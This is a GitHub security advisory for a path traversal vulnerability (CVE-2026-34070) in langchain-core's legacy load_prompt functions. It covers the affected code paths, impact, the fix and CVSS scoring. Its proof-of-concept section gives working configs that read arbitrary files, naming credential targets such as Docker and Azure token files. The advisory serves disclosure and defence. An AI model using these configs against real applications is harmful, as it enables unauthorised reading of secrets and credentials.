Skip to content

LangChain Core has Path Traversal vulnerabilites in legacy `load_prompt` functions

High severity GitHub Reviewed Published Mar 26, 2026 in langchain-ai/langchain • Updated Mar 27, 2026

Package

pip langchain-core (pip)

Affected versions

< 1.2.22

Patched versions

1.2.22

Description

Summary

Multiple functions in langchain_core.prompts.loading read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to load_prompt() or load_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txt for templates, .json/.yaml for examples).

Note: The affected functions (load_prompt, load_prompt_from_config, and the .save() method on prompt classes) are undocumented legacy APIs. They are superseded by the dumpd/dumps/load/loads serialization APIs in langchain_core.load, which do not perform filesystem reads and use an allowlist-based security model. As part of this fix, the legacy APIs have been formally deprecated and will be removed in 2.0.0.

Affected component

Package: langchain-core
File: langchain_core/prompts/loading.py
Affected functions: _load_template(), _load_examples(), _load_few_shot_prompt()

Severity

High

The score reflects the file-extension constraints that limit which files can be read.

Vulnerable code paths

Config key Loaded by Readable extensions
template_path, suffix_path, prefix_path _load_template() .txt
examples (when string) _load_examples() .json, .yaml, .yml
example_prompt_path _load_few_shot_prompt() .json, .yaml, .yml

None of these code paths validated the supplied path against absolute path injection or .. traversal sequences before reading from disk.

Impact

An attacker who controls or influences the prompt configuration dict can read files outside the intended directory:

  • .txt files: cloud-mounted secrets (/mnt/secrets/api_key.txt), requirements.txt, internal system prompts
  • .json/.yaml files: cloud credentials (~/.docker/config.json, ~/.azure/accessTokens.json), Kubernetes manifests, CI/CD configs, application settings

This is exploitable in applications that accept prompt configs from untrusted sources, including low-code AI builders and API wrappers that expose load_prompt_from_config().

Proof of concept

from langchain_core.prompts.loading import load_prompt_from_config

# Reads /tmp/secret.txt via absolute path injection
config = {
    "_type": "prompt",
    "template_path": "/tmp/secret.txt",
    "input_variables": [],
}
prompt = load_prompt_from_config(config)
print(prompt.template)  # file contents disclosed

# Reads ../../etc/secret.txt via directory traversal
config = {
    "_type": "prompt",
    "template_path": "../../etc/secret.txt",
    "input_variables": [],
}
prompt = load_prompt_from_config(config)

# Reads arbitrary .json via few-shot examples
config = {
    "_type": "few_shot",
    "examples": "../../../../.docker/config.json",
    "example_prompt": {
        "_type": "prompt",
        "input_variables": ["input", "output"],
        "template": "{input}: {output}",
    },
    "prefix": "",
    "suffix": "{query}",
    "input_variables": ["query"],
}
prompt = load_prompt_from_config(config)

Mitigation

Update langchain-core to >= 1.2.22.

The fix adds path validation that rejects absolute paths and .. traversal sequences by default. An allow_dangerous_paths=True keyword argument is available on load_prompt() and load_prompt_from_config() for trusted inputs.

As described above, these legacy APIs have been formally deprecated. Users should migrate to dumpd/dumps/load/loads from langchain_core.load.

Credit

References

@ccurme ccurme published to langchain-ai/langchain Mar 26, 2026
Published to the GitHub Advisory Database Mar 27, 2026
Reviewed Mar 27, 2026
Last updated Mar 27, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS score

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

CVE ID

CVE-2026-34070

GHSA ID

GHSA-qh6h-p6c9-ff54

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.